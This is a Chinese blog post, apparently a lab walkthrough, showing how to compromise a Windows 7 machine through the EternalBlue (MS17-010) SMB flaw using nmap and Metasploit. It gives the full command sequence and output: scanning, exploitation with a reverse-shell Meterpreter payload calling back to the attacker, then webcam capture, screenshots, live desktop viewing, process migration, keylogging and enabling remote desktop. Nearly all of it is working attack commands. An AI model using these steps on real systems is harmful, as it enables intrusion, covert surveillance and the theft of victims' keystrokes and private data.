永恒之蓝漏洞(windows7)

最新推荐文章于 2024-06-24 15:26:14 发布
最新推荐文章于 2024-06-24 15:26:14 发布
阅读量3.6k 收藏 6
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ricklzc/article/details/122418181
版权

扫描端口

┌──(root💀kali)-[~/桌面]
└─# nmap -sS -p 445 -oG - 192.168.0.0/24 | grep open
Host: 192.168.0.18 (localhost)  Ports: 445/open/tcp//microsoft-ds///
Host: 192.168.0.26 (localhost)  Ports: 445/open/tcp//microsoft-ds///
Host: 192.168.0.44 (localhost)  Ports: 445/open/tcp//microsoft-ds///

检测msf的数据库是否启动

┌──(root💀kali)-[~/桌面]
└─# msfdb status
 postgresql.service - PostgreSQL RDBMS
     Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; vendor preset: disabled)
     Active: active (exited) since Fri 2021-05-07 19:19:46 CST; 3 months 6 days ago
    Process: 2114 ExecStart=/bin/true (code=exited, status=0/SUCCESS)
   Main PID: 2114 (code=exited, status=0/SUCCESS)
        CPU: 2ms

5 07 19:19:46 kali systemd[1]: Starting PostgreSQL RDBMS...
5 07 19:19:46 kali systemd[1]: Finished PostgreSQL RDBMS.

COMMAND   PID     USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
postgres 2096 postgres    5u  IPv6  31630      0t0  TCP localhost:5432 (LISTEN)
postgres 2096 postgres    6u  IPv4  31631      0t0  TCP localhost:5432 (LISTEN)

UID          PID    PPID  C STIME TTY      STAT   TIME CMD
postgres    2096       1  0 12:43 ?        Ss     0:01 /usr/lib/postgresql/13/bin/postgres -D /var/lib/postgresql/13/main -c config_file=/etc/postgresql/13/main/postgresql.conf

[+] Detected configuration file (/usr/share/metasploit-framework/config/database.yml)

启动msf

                                                                                                                                                                                                                  
┌──(root💀kali)-[~/桌面]
└─# msfconsole  
                                                  

  Metasploit Park, System Security Interface                                                                                                                                                                      
  Version 4.0.5, Alpha E                                                                                                                                                                                          
  Ready...                                                                                                                                                                                                        
  > access security                                                                                                                                                                                               
  access: PERMISSION DENIED.
  > access security grid
  access: PERMISSION DENIED.
  > access main security grid
  access: PERMISSION DENIED....and...
  YOU DIDN'T SAY THE MAGIC WORD!
  YOU DIDN'T SAY THE MAGIC WORD!                                                                                                                                                                                  
  YOU DIDN'T SAY THE MAGIC WORD!                                                                                                                                                                                  
  YOU DIDN'T SAY THE MAGIC WORD!                                                                                                                                                                                  
  YOU DIDN'T SAY THE MAGIC WORD!                                                                                                                                                                                  
  YOU DIDN'T SAY THE MAGIC WORD!                                                                                                                                                                                  
  YOU DIDN'T SAY THE MAGIC WORD!                                                                                                                                                                                  


       =[ metasploit v6.0.37-dev                          ]
+ -- --=[ 2111 exploits - 1136 auxiliary - 357 post       ]
+ -- --=[ 592 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 8 evasion                                       ]

Metasploit tip: After running db_nmap, be sure to 
check out the result of hosts and services

msf6 >

找永恒之蓝工具

msf6 > search ms17_010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   2  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
   3  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   4  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection


Interact with a module by name or index. For example info 4, use 4 or use auxiliary/scanner/smb/smb_ms17_010

检测是否存在永恒之蓝漏洞

………………………………………………………………………………………………………………………………………………………………………………………………
msf6 > use auxiliary/scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > set rhost 192.168.0.44
rhost => 192.168.0.44
msf6 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 192.168.0.44:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.0.44:445      - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_ms17_010) >

使用exploit利用漏洞

msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > 
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.0.44
rhost => 192.168.0.44
msf6 exploit(windows/smb/ms17_010_eternalblue) > run

[*] Started reverse TCP handler on 192.168.0.130:4444 
[*] 192.168.0.44:445 - Executing automatic check (disable AutoCheck to override)
[*] 192.168.0.44:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.0.44:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.0.44:445      - Scanned 1 of 1 hosts (100% complete)
[+] 192.168.0.44:445 - The target is vulnerable.
[*] 192.168.0.44:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 192.168.0.44:445      - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit)
[*] 192.168.0.44:445      - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.0.44:445 - Connecting to target for exploitation.
[+] 192.168.0.44:445 - Connection established for exploitation.
[+] 192.168.0.44:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.0.44:445 - CORE raw buffer dump (38 bytes)
[*] 192.168.0.44:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61  Windows 7 Ultima
[*] 192.168.0.44:445 - 0x00000010  74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20  te 7601 Service 
[*] 192.168.0.44:445 - 0x00000020  50 61 63 6b 20 31                                Pack 1          
[+] 192.168.0.44:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.0.44:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.0.44:445 - Sending all but last fragment of exploit packet
[*] 192.168.0.44:445 - Starting non-paged pool grooming
[+] 192.168.0.44:445 - Sending SMBv2 buffers
[+] 192.168.0.44:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.0.44:445 - Sending final SMBv2 buffers.
[*] 192.168.0.44:445 - Sending last fragment of exploit packet!
[*] 192.168.0.44:445 - Receiving response from exploit packet
[+] 192.168.0.44:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.0.44:445 - Sending egg to corrupted connection.
[*] 192.168.0.44:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 192.168.0.44
[*] Meterpreter session 1 opened (192.168.0.130:4444 -> 192.168.0.44:49169) at 2021-08-13 20:12:50 +0800
[+] 192.168.0.44:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.0.44:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.0.44:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >

摄像头设备利用

## 查看摄像头列表
meterpreter > webcam_list
1: Integrated Camera
meterpreter > 

## 打开摄像头
meterpreter > webcam_stream 
[*] Starting...
[*] Preparing player...
[*] Opening player at: /root/桌面/wdLIGCsG.html
[*] Streaming...

## 利用摄像头拍照
meterpreter > 
meterpreter > webcam_snap 
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/桌面/OBFcneAz.jpeg
meterpreter >

捕捉屏幕截图

meterpreter > screensh
screenshare  screenshot   
meterpreter > screenshot 
Screenshot saved to: /root/桌面/AntqirEf.jpeg
meterpreter >

实时监控桌面

meterpreter > screenshare 
[*] Preparing player...
[*] Opening player at: /root/桌面/ijMyjxef.html
[*] Streaming...
^C[GFX1-]: Receive IPC close with reason=AbnormalShutdown
Exiting due to channel error.
Exiting due to channel error.
Exiting due to channel error.
Exiting due to channel error.
[-] Error running command screenshare: Interrupt

抓取键盘记录

## 查询当前进程号
meterpreter > ps

Process List
============

 PID   PPID  Name                       Arch  Session  User                          Path
 ---   ----  ----                       ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System                     x64   0
 168   584   svchost.exe                x64   0        NT AUTHORITY\LOCAL SERVICE
 300   4     smss.exe                   x64   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
 468   372   csrss.exe                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 524   372   wininit.exe                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\wininit.exe
 532   516   csrss.exe                  x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 580   972   dwm.exe                    x64   1        yuanan-PC\yuanan              C:\Windows\system32\Dwm.exe
 584   524   services.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\services.exe
 592   524   lsass.exe                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsass.exe
 600   524   lsm.exe                    x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsm.exe
 700   584   svchost.exe                x64   0        NT AUTHORITY\SYSTEM
 760   584   ibmpmsvc.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\ibmpmsvc.exe
 792   584   LPlatSvc.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\LPlatSvc.exe
 800   584   PresentationFontCache.exe  x64   0        NT AUTHORITY\LOCAL SERVICE
 872   584   svchost.exe                x64   0        NT AUTHORITY\NETWORK SERVICE
 920   1144  igfxEM.exe                 x64   1        yuanan-PC\yuanan              C:\Windows\system32\igfxEM.exe
 936   584   svchost.exe                x64   0        NT AUTHORITY\LOCAL SERVICE
 972   584   svchost.exe                x64   0        NT AUTHORITY\SYSTEM
 1000  584   svchost.exe                x64   0        NT AUTHORITY\SYSTEM
 1028  1120  RAVBg64.exe                x64   1        NT AUTHORITY\SYSTEM           C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
 1060  584   igfxCUIService.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\igfxCUIService.exe
 1112  1144  igfxHK.exe                 x64   1        yuanan-PC\yuanan              C:\Windows\system32\igfxHK.exe
 1120  584   RtkAudioService64.exe      x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
 1176  584   svchost.exe                x64   0        NT AUTHORITY\NETWORK SERVICE
 1256  516   winlogon.exe               x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\winlogon.exe
 1368  1928  explorer.exe               x64   1        yuanan-PC\yuanan              C:\Windows\Explorer.EXE
 1416  1144  igfxTray.exe               x64   1        yuanan-PC\yuanan              C:\Windows\system32\igfxTray.exe
 1440  584   spoolsv.exe                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1488  584   svchost.exe                x64   0        NT AUTHORITY\LOCAL SERVICE
 1552  1440  PDMQlQpOYKl.exe            x86   0        NT AUTHORITY\SYSTEM           C:\Windows\TEMP\PDMQlQpOYKl.exe
 1720  584   svchost.exe                x64   0        NT AUTHORITY\LOCAL SERVICE
 1904  584   svchost.exe                x64   0        NT AUTHORITY\NETWORK SERVICE
 1936  1000  taskeng.exe                x64   1        yuanan-PC\yuanan              C:\Windows\system32\taskeng.exe
 2236  1440  nDjWCo.exe                 x86   0        NT AUTHORITY\SYSTEM           C:\Windows\TEMP\nDjWCo.exe
 2284  584   wmpnetwk.exe               x64   0        NT AUTHORITY\NETWORK SERVICE
 2288  792   LPlatSvc.exe               x64   1        yuanan-PC\yuanan              C:\Windows\system32\LPlatSvc.exe
 2296  584   taskhost.exe               x64   1        yuanan-PC\yuanan              C:\Windows\system32\taskhost.exe
 2532  584   svchost.exe                x64   0        NT AUTHORITY\LOCAL SERVICE
 2568  584   sppsvc.exe                 x64   0        NT AUTHORITY\NETWORK SERVICE
 2608  584   svchost.exe                x64   0        NT AUTHORITY\SYSTEM
 2672  584   SearchIndexer.exe          x64   0        NT AUTHORITY\SYSTEM
 3100  1936  RAVBg64.exe                x64   1        yuanan-PC\yuanan              C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
 3164  3112  RAVCpl64.exe               x64   1        yuanan-PC\yuanan              C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
 3500  1440  HPGNJDtrnf.exe             x86   0        NT AUTHORITY\SYSTEM           C:\Windows\TEMP\HPGNJDtrnf.exe

## 打开记事本之后再次查看当前进程号
meterpreter > ps

Process List
============

 PID   PPID  Name                       Arch  Session  User                          Path
 ---   ----  ----                       ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System                     x64   0
 168   584   svchost.exe                x64   0        NT AUTHORITY\LOCAL SERVICE
 300   4     smss.exe                   x64   0        NT AUTHORITY\SYSTEM           \SystemRoot\System32\smss.exe
 468   372   csrss.exe                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 524   372   wininit.exe                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\wininit.exe
 532   516   csrss.exe                  x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\csrss.exe
 580   972   dwm.exe                    x64   1        yuanan-PC\yuanan              C:\Windows\system32\Dwm.exe
 584   524   services.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\services.exe
 592   524   lsass.exe                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsass.exe
 600   524   lsm.exe                    x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\lsm.exe
 700   584   svchost.exe                x64   0        NT AUTHORITY\SYSTEM
 760   584   ibmpmsvc.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\ibmpmsvc.exe
 792   584   LPlatSvc.exe               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\LPlatSvc.exe
 800   584   PresentationFontCache.exe  x64   0        NT AUTHORITY\LOCAL SERVICE
 872   584   svchost.exe                x64   0        NT AUTHORITY\NETWORK SERVICE
 920   1144  igfxEM.exe                 x64   1        yuanan-PC\yuanan              C:\Windows\system32\igfxEM.exe
 936   584   svchost.exe                x64   0        NT AUTHORITY\LOCAL SERVICE
 972   584   svchost.exe                x64   0        NT AUTHORITY\SYSTEM
 1000  584   svchost.exe                x64   0        NT AUTHORITY\SYSTEM
 1028  1120  RAVBg64.exe                x64   1        NT AUTHORITY\SYSTEM           C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
 1060  584   igfxCUIService.exe         x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\igfxCUIService.exe
 1112  1144  igfxHK.exe                 x64   1        yuanan-PC\yuanan              C:\Windows\system32\igfxHK.exe
 1120  584   RtkAudioService64.exe      x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
 1176  584   svchost.exe                x64   0        NT AUTHORITY\NETWORK SERVICE
 1256  516   winlogon.exe               x64   1        NT AUTHORITY\SYSTEM           C:\Windows\system32\winlogon.exe
 1368  1928  explorer.exe               x64   1        yuanan-PC\yuanan              C:\Windows\Explorer.EXE
 1416  1144  igfxTray.exe               x64   1        yuanan-PC\yuanan              C:\Windows\system32\igfxTray.exe
 1440  584   spoolsv.exe                x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 1488  584   svchost.exe                x64   0        NT AUTHORITY\LOCAL SERVICE
 1552  1440  PDMQlQpOYKl.exe            x86   0        NT AUTHORITY\SYSTEM           C:\Windows\TEMP\PDMQlQpOYKl.exe
 1720  584   svchost.exe                x64   0        NT AUTHORITY\LOCAL SERVICE
 1904  584   svchost.exe                x64   0        NT AUTHORITY\NETWORK SERVICE
 1936  1000  taskeng.exe                x64   1        yuanan-PC\yuanan              C:\Windows\system32\taskeng.exe
 2236  1440  nDjWCo.exe                 x86   0        NT AUTHORITY\SYSTEM           C:\Windows\TEMP\nDjWCo.exe
 2256  1368  notepad.exe                x64   1        yuanan-PC\yuanan              C:\Windows\system32\NOTEPAD.EXE
 2284  584   wmpnetwk.exe               x64   0        NT AUTHORITY\NETWORK SERVICE
 2288  792   LPlatSvc.exe               x64   1        yuanan-PC\yuanan              C:\Windows\system32\LPlatSvc.exe
 2296  584   taskhost.exe               x64   1        yuanan-PC\yuanan              C:\Windows\system32\taskhost.exe
 2400  2672  SearchFilterHost.exe       x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\SearchFilterHost.exe
 2532  584   svchost.exe                x64   0        NT AUTHORITY\LOCAL SERVICE
 2568  584   sppsvc.exe                 x64   0        NT AUTHORITY\NETWORK SERVICE
 2608  584   svchost.exe                x64   0        NT AUTHORITY\SYSTEM
 2672  584   SearchIndexer.exe          x64   0        NT AUTHORITY\SYSTEM
 3100  1936  RAVBg64.exe                x64   1        yuanan-PC\yuanan              C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
 3164  3112  RAVCpl64.exe               x64   1        yuanan-PC\yuanan              C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
 3500  1440  HPGNJDtrnf.exe             x86   0        NT AUTHORITY\SYSTEM           C:\Windows\TEMP\HPGNJDtrnf.exe
 4052  2672  SearchProtocolHost.exe     x64   0        NT AUTHORITY\SYSTEM           C:\Windows\system32\SearchProtocolHost.exe

## 转移至记事本的进程号
meterpreter > migrate 2256
[*] Migrating from 1440 to 2256...
[*] Migration completed successfully.
meterpreter > 
meterpreter > key
keyboard_send  keyevent       keyscan_dump   keyscan_start  keyscan_stop   

## 开启键盘抓取
meterpreter > keyscan_start
Starting the keystroke sniffer ...

## dump键盘操作记录
meterpreter > keyscan_dump 
Dumping captured keystrokes...
jhgjhgjhghjgjhllll<CR>
<CR>
<CR>
<CR>
1dsds<CR>

## 结束键盘抓取
meterpreter > keyscan_stop
Stopping the keystroke sniffer...
meterpreter >

启远程桌面

run post/windows/manage/enable_rdp
Ricklzc
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
〖EXP〗NSA MS17010永恒之蓝一键工具
K8哥哥
01-05 7641
漏洞简介 永恒之蓝是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。 漏洞检测 无损检测,不会对目标造成任何危害,大家无需担心 Ladon 192.168.1.8 MS1701
Windows 7 ms17-010永恒之蓝漏洞复现
m0_51600840的博客
07-04 2185
复现ms17-010漏洞环境:1.进入框架:msfconsole 2.使用search命令查找相关漏洞: search ms17-010 3.使用use进入模块: use exploit/windows/smb/ms17_010_eternalblue 4.设置本机地址:set lhost 192.168.238.130(输入自己本机的IP地址即kali虚拟机地址) 5. 设置靶机地址:set rhost 192.168.238.128(输入靶机的IP地址即Windows 7虚拟机地址) 注意靶机地址和攻
永恒之蓝漏洞属于什么漏洞/永恒之蓝漏洞检测工具-零基础攻防笔记
最新发布
程序员三九的博客
06-24 428
项目三 永恒之蓝漏洞利用.docx,永恒之蓝漏洞利用 本次测试主要是利用永恒之蓝漏洞windows7进行控制利用,掌握Metasploit工具的使用,知道永恒之蓝漏洞利用原理。
Windows永恒之蓝漏洞复现
pythonZLX的博客
01-05 309
windows 永恒之蓝漏洞复现
永恒之蓝--Windows7
chang113的博客
06-20 1171
永恒之蓝--Windows7
MS17-010漏洞攻击与防御(利用永恒之蓝攻击Win7系统)
hmysn的博客
12-22 2475
永恒之蓝漏洞攻击
永恒之蓝漏洞扫描工具官方版
08-06
"永恒之蓝漏洞",全称为MS17-010漏洞,是Windows操作系统中一个极为严重的安全漏洞,由黑客组织Shadow Brokers泄露的NSA(美国国家安全局)网络武器库中的攻击工具所利用。该漏洞主要针对的是未打补丁的Windows系统...
永恒之蓝配置Windows7
10-24
Windows7下的永恒之蓝漏洞入侵 Windows7 是一种广泛使用的操作系统,但它也存在一些漏洞,例如永恒之蓝漏洞(MS17-010)。本文将讲解如何使用 Kali Linux 中的 MSF-Metasploit 来利用永恒之蓝漏洞入侵 Windows7 ...
永恒之蓝漏洞演示
12-22
永恒之蓝漏洞演示的视频主要展示了如何利用Kali Linux操作系统在Windows 7系统上进行渗透测试,演示了永恒之蓝(MS17-010)漏洞的利用过程。Kali Linux是一个广泛应用于信息安全领域的Linux发行版,它预装了许多渗透...
永恒之蓝(ms17010)漏洞检测工具
04-19
在司徒西大神易语言ms17010漏洞检测源码上稍做修改,并做成了批处理,可以单机也可以网段批量检测永恒之蓝漏洞。优点是体积小,扫描准确。缺点是扫描速度较慢。 使用方法: 此程序为易语言开发,如被误报病毒,可以...
win2012R2永恒之蓝安全补丁.zip
05-12
总结来说,Windows Server 2012 R2用户必须重视永恒之蓝漏洞,及时安装KB4012213和KB4012216安全补丁,以防止恶意软件的侵入。同时,定期更新系统、禁用不安全的服务和协议,也是保障网络安全的基础措施。对于大型...
kali利用永恒之蓝攻击win7
热门推荐
sievr的博客
02-11 1万+
kali机:192.168.198.134 win7:192.168.198.138 照常来查看一下自己的IP地址 接下来就是配置靶机的环境了 1.网络连接方式选择公用网络 2.关闭公用网络的防火墙(否则ping不通靶机) 现在可以离开win7了 打开我们最可爱的kali,启动我们的msfconsole小可爱 (msfconsole都是爱你的样子哟) 好的我们来搜索一下永恒之蓝在msf中...
在利用msf进行提权操作是出现timed out:Error running command shell: Rex::TimeoutError Operation timed out.
xcyja的博客
05-10 2477
在利用msf进行提权操作是出现timed out: 执行shell命令时报错: Error running command shell: Rex::TimeoutError Operation timed out. 错误原因:发现靶机和攻击机不在一个网段中 解决方法: 将靶机的网络连接方式改为NAT模式 电脑中的ip地址方式改为自动获取 即 两个主机之间能相互ping通 ...
浅析ms17_010(永恒之蓝漏洞利用过程及防护措施
qq_24797991的博客
03-27 4129
永恒之蓝勒索病毒漏洞复现及防范
利用永恒之蓝渗透WIN7
Cwillchris的博客
10-18 3877
实验名称:利用永恒之蓝渗透win7 实验人:xx 实验日期:2021.9.24 实验目的:通过已知漏洞攻击目标服务器并拿到shell 实验环境: kali:172.16.12.30 win7靶机:172.16.12.4 用户名:administrator 密码:vgrant 实验步骤: 配置靶机防火墙,将相应的“阻塞端口安全策略”————Disabled 查看MS17-010相关模块,并使用序号3扫描模块扫描目标及 msf6 > search ms17-010 msf6
【ms17-010】永恒之蓝漏洞复现
leekos的博客,分享web安全相关知识~
04-04 1847
因为只要掌握MSF的使用方法,每个人都可以使用MSF来攻击那些未打过补丁或者刚刚打过补丁的漏洞。(MSF)是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。首先我们先在攻击机上使用nmap扫一下该网段主机的存活情况。扫描出来了漏洞,接着我们需要使用工具利用漏洞。这个时候我们已经成功了,远程命令执行。的主机开启,并且显示了开放的端口号。设置完成之后,就可以开始攻击了,使用。分析了相关信息后,我们就可以使用。命令可以查看可以使用哪些命令。(靶机的ip地址),使用。
漏洞复现过程步骤
qq_74247740的博客
10-18 201
影响版本:Microsoft Windows Vista SP2,Windows Server 2008 SP2和R2 SP1,Windows 7 SP1,Windows 8.1,Windows Server 2012 Gold和R2,Windows RT 8.1,Windows 10 Gold,1511和1607,Windows Server 2016。端口版本:Windows Server 2008 R2 standard 7600 Microsoft-ds。端口:445端口 smb文件共享服务。
手把手教你如何复现MS17-010永恒之蓝漏洞
didiplus
08-17 1945
永恒之蓝是指2017年4月14日晚, “永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,在多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。
渗透测试-[windows-MS08-067、MS10-046、MS17-010、MS12-020]
m0_43405474的博客
05-05 3042
【MS漏洞攻击实验-MS08-067、MS10-046、MS17-010、MS-12-020】0.实验环境1.MS08-067【RPC】1.1 漏洞描述1.2 主机发现1.3 利用MSF通过ms08-067漏洞渗透目标系统1.4 后渗透利用1.查看权限:2.Shell3.添加账号4.将新账号添加到管理员组中5.截屏2.MS10-046【快捷方式自动执行代码】2.1 漏洞描述2.2 渗透攻击2.3 后渗透利用3.MS17-010【SMB】3.1 漏洞描述3.2 渗透攻击3.2.1 目标发现3.2.2 渗透攻击
windows10永恒之蓝漏洞复现
05-24
Windows10永恒之蓝漏洞是指微软Windows操作系统的SMBv1协议中的一个安全漏洞,该漏洞最初被美国国家安全局(NSA)利用,后来泄露出来被黑客组织WannaCry等利用。该漏洞可以允许攻击者远程执行代码,获取敏感信息或者...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值